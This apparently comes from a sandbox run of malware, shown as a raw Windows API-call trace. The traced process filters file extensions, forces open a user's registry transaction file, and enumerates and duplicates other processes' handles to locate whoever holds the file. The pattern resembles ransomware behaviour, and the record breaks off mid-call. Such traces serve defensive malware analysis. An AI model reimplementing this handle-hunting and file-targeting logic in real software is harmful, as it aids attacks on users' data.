wcslen (_String="exe") returned 0x3 [0154.322] _wcsicmp (_Str1="hlp", _Str2="regtrans-ms") returned -10 [0154.322] wcslen (_String="hlp") returned 0x3 [0154.322] _wcsicmp (_Str1="icl", _Str2="regtrans-ms") returned -9 [0154.322] wcslen (_String="icl") returned 0x3 [0154.322] _wcsicmp (_Str1="icns", _Str2="regtrans-ms") returned -9 [0154.322] wcslen (_String="icns") returned 0x4 [0154.322] _wcsicmp (_Str1="ico", _Str2="regtrans-ms") returned -9 [0154.322] wcslen (_String="ico") returned 0x3 [0154.322] _wcsicmp (_Str1="ics", _Str2="regtrans-ms") returned -9 [0154.323] wcslen (_String="ics") returned 0x3 [0154.323] _wcsicmp (_Str1="idx", _Str2="regtrans-ms") returned -9 [0154.323] wcslen (_String="idx") returned 0x3 [0154.323] _wcsicmp (_Str1="ldf", _Str2="regtrans-ms") returned -6 [0154.323] wcslen (_String="ldf") returned 0x3 [0154.323] _wcsicmp (_Str1="lnk", _Str2="regtrans-ms") returned -6 [0154.323] wcslen (_String="lnk") returned 0x3 [0154.323] _wcsicmp (_Str1="mod", _Str2="regtrans-ms") returned -5 [0154.323] wcslen (_String="mod") returned 0x3 [0154.323] _wcsicmp (_Str1="mpa", _Str2="regtrans-ms") returned -5 [0154.323] wcslen (_String="mpa") returned 0x3 [0154.323] _wcsicmp (_Str1="msc", _Str2="regtrans-ms") returned -5 [0154.323] wcslen (_String="msc") returned 0x3 [0154.323] _wcsicmp (_Str1="msp", _Str2="regtrans-ms") returned -5 [0154.323] wcslen (_String="msp") returned 0x3 [0154.323] _wcsicmp (_Str1="msstyles", _Str2="regtrans-ms") returned -5 [0154.323] wcslen (_String="msstyles") returned 0x8 [0154.323] _wcsicmp (_Str1="msu", _Str2="regtrans-ms") returned -5 [0154.323] wcslen (_String="msu") returned 0x3 [0154.323] _wcsicmp (_Str1="nls", _Str2="regtrans-ms") returned -4 [0154.323] wcslen (_String="nls") returned 0x3 [0154.323] _wcsicmp (_Str1="nomedia", _Str2="regtrans-ms") returned -4 [0154.323] wcslen (_String="nomedia") returned 0x7 [0154.323] _wcsicmp (_Str1="ocx", _Str2="regtrans-ms") returned -3 [0154.323] wcslen (_String="ocx") returned 0x3 [0154.323] _wcsicmp (_Str1="prf", _Str2="regtrans-ms") returned -2 [0154.323] wcslen (_String="prf") returned 0x3 [0154.323] _wcsicmp (_Str1="ps1", _Str2="regtrans-ms") returned -2 [0154.323] wcslen (_String="ps1") returned 0x3 [0154.323] _wcsicmp (_Str1="rom", _Str2="regtrans-ms") returned 10 [0154.323] wcslen (_String="rom") returned 0x3 [0154.323] _wcsicmp (_Str1="rtp", _Str2="regtrans-ms") returned 15 [0154.323] wcslen (_String="rtp") returned 0x3 [0154.323] _wcsicmp (_Str1="scr", _Str2="regtrans-ms") returned 1 [0154.323] wcslen (_String="scr") returned 0x3 [0154.323] _wcsicmp (_Str1="shs", _Str2="regtrans-ms") returned 1 [0154.323] wcslen (_String="shs") returned 0x3 [0154.323] _wcsicmp (_Str1="spl", _Str2="regtrans-ms") returned 1 [0154.323] wcslen (_String="spl") returned 0x3 [0154.324] _wcsicmp (_Str1="sys", _Str2="regtrans-ms") returned 1 [0154.324] wcslen (_String="sys") returned 0x3 [0154.324] _wcsicmp (_Str1="theme", _Str2="regtrans-ms") returned 2 [0154.324] wcslen (_String="theme") returned 0x5 [0154.324] _wcsicmp (_Str1="themepack", _Str2="regtrans-ms") returned 2 [0154.324] wcslen (_String="themepack") returned 0x9 [0154.324] _wcsicmp (_Str1="wpx", _Str2="regtrans-ms") returned 5 [0154.324] wcslen (_String="wpx") returned 0x3 [0154.324] _wcsicmp (_Str1="lock", _Str2="regtrans-ms") returned -6 [0154.324] wcslen (_String="lock") returned 0x4 [0154.324] _wcsicmp (_Str1="key", _Str2="regtrans-ms") returned -7 [0154.324] wcslen (_String="key") returned 0x3 [0154.324] _wcsicmp (_Str1="hta", _Str2="regtrans-ms") returned -10 [0154.324] wcslen (_String="hta") returned 0x3 [0154.324] _wcsicmp (_Str1="msi", _Str2="regtrans-ms") returned -5 [0154.324] wcslen (_String="msi") returned 0x3 [0154.324] _wcsicmp (_Str1="pdb", _Str2="regtrans-ms") returned -2 [0154.324] wcslen (_String="pdb") returned 0x3 [0154.324] _wcsicmp (_Str1="sql", _Str2="regtrans-ms") returned 1 [0154.324] wcslen (_String="sql") returned 0x3 [0154.324] _wcsicmp (_Str1="sqlite", _Str2="regtrans-ms") returned 1 [0154.324] wcslen (_String="sqlite") returned 0x6 [0154.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0154.324] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0154.324] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz" [0154.324] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x21 [0154.324] wcscpy (in: _Dest=0x44a00a4, _Source="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: _Dest="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0154.324] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x80) returned 1 [0154.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0154.325] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x62c [0154.325] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0154.325] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fed80 | out: SystemInformation=0x4e4170, ResultLength=0x3fed80*=0x28034) returned 0xc0000004 [0154.326] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x28034) returned 0x44b0068 [0154.326] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x28034, ResultLength=0x3fed80 | out: SystemInformation=0x44b0068, ResultLength=0x3fed80*=0x28034) returned 0x0 [0154.329] GetCurrentProcessId () returned 0x6fc [0154.329] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0154.329] CloseHandle (hObject=0x62c) returned 1 [0154.329] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x400) returned 0x4e4170 [0154.329] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x4e4170, Length=0x400, ResultLength=0x3fedc0 | out: SystemInformation=0x4e4170, ResultLength=0x3fedc0*=0x28024) returned 0xc0000004 [0154.330] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4e4170, Size=0x28024) returned 0x44b0068 [0154.330] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x44b0068, Length=0x28024, ResultLength=0x3fedc0 | out: SystemInformation=0x44b0068, ResultLength=0x3fedc0*=0x28024) returned 0x0 [0154.333] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x10000) returned 0x44d8098 [0154.333] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.333] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.334] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.336] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.336] CloseHandle (hObject=0x670) returned 1 [0154.336] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.336] CloseHandle (hObject=0x680) returned 1 [0154.336] CloseHandle (hObject=0x62c) returned 1 [0154.336] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.336] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.337] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.337] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.339] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.339] CloseHandle (hObject=0x670) returned 1 [0154.339] CloseHandle (hObject=0x680) returned 1 [0154.339] CloseHandle (hObject=0x62c) returned 1 [0154.339] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.339] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.340] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.340] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.340] CloseHandle (hObject=0x670) returned 1 [0154.341] CloseHandle (hObject=0x680) returned 1 [0154.341] CloseHandle (hObject=0x62c) returned 1 [0154.341] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.341] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.342] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.343] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.343] CloseHandle (hObject=0x670) returned 1 [0154.343] CloseHandle (hObject=0x680) returned 1 [0154.343] CloseHandle (hObject=0x62c) returned 1 [0154.343] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.343] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x18, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.343] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.344] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.345] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.345] CloseHandle (hObject=0x670) returned 1 [0154.345] CloseHandle (hObject=0x680) returned 1 [0154.345] CloseHandle (hObject=0x62c) returned 1 [0154.345] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.345] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.345] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.346] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.347] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.347] CloseHandle (hObject=0x670) returned 1 [0154.347] CloseHandle (hObject=0x680) returned 1 [0154.347] CloseHandle (hObject=0x62c) returned 1 [0154.347] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.347] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.348] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.348] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.348] CloseHandle (hObject=0x670) returned 1 [0154.348] CloseHandle (hObject=0x680) returned 1 [0154.349] CloseHandle (hObject=0x62c) returned 1 [0154.349] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.349] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x24, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.349] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.350] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.350] CloseHandle (hObject=0x670) returned 1 [0154.350] CloseHandle (hObject=0x680) returned 1 [0154.350] CloseHandle (hObject=0x62c) returned 1 [0154.350] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x104) returned 0x62c [0154.350] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x28, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.351] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.352] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.352] CloseHandle (hObject=0x670) returned 1 [0154.352] CloseHandle (hObject=0x680) returned 1 [0154.352] CloseHandle (hObject=0x62c) returned 1 [0154.352] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0154.352] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.352] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.353] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.354] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.354] CloseHandle (hObject=0x670) returned 1 [0154.354] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.354] CloseHandle (hObject=0x680) returned 1 [0154.354] CloseHandle (hObject=0x62c) returned 1 [0154.354] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x148) returned 0x62c [0154.354] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.355] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.357] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.357] CloseHandle (hObject=0x670) returned 1 [0154.357] CloseHandle (hObject=0x680) returned 1 [0154.357] CloseHandle (hObject=0x62c) returned 1 [0154.357] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.357] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.358] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.359] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.360] CloseHandle (hObject=0x670) returned 1 [0154.360] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.360] CloseHandle (hObject=0x680) returned 1 [0154.360] CloseHandle (hObject=0x62c) returned 1 [0154.360] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.360] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.360] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.361] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.362] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.362] CloseHandle (hObject=0x670) returned 1 [0154.362] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.362] CloseHandle (hObject=0x680) returned 1 [0154.362] CloseHandle (hObject=0x62c) returned 1 [0154.362] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.362] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xcc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.363] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.365] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.365] CloseHandle (hObject=0x670) returned 1 [0154.365] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.365] CloseHandle (hObject=0x680) returned 1 [0154.365] CloseHandle (hObject=0x62c) returned 1 [0154.365] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.365] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.366] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.366] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.366] CloseHandle (hObject=0x670) returned 1 [0154.366] _wcsicmp (_Str1="\\InitShutdown", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0154.366] CloseHandle (hObject=0x680) returned 1 [0154.366] CloseHandle (hObject=0x62c) returned 1 [0154.366] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.366] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.366] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.367] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.368] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.368] CloseHandle (hObject=0x670) returned 1 [0154.368] CloseHandle (hObject=0x680) returned 1 [0154.368] CloseHandle (hObject=0x62c) returned 1 [0154.368] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.368] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.368] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.369] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.369] CloseHandle (hObject=0x670) returned 1 [0154.369] CloseHandle (hObject=0x680) returned 1 [0154.369] CloseHandle (hObject=0x62c) returned 1 [0154.369] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.369] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.370] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.370] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.371] CloseHandle (hObject=0x670) returned 1 [0154.371] CloseHandle (hObject=0x680) returned 1 [0154.371] CloseHandle (hObject=0x62c) returned 1 [0154.371] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.371] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.371] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.371] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.372] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.372] CloseHandle (hObject=0x670) returned 1 [0154.372] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0154.372] CloseHandle (hObject=0x680) returned 1 [0154.372] CloseHandle (hObject=0x62c) returned 1 [0154.372] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0154.372] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.373] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.375] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.375] CloseHandle (hObject=0x670) returned 1 [0154.375] CloseHandle (hObject=0x680) returned 1 [0154.375] CloseHandle (hObject=0x62c) returned 1 [0154.375] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 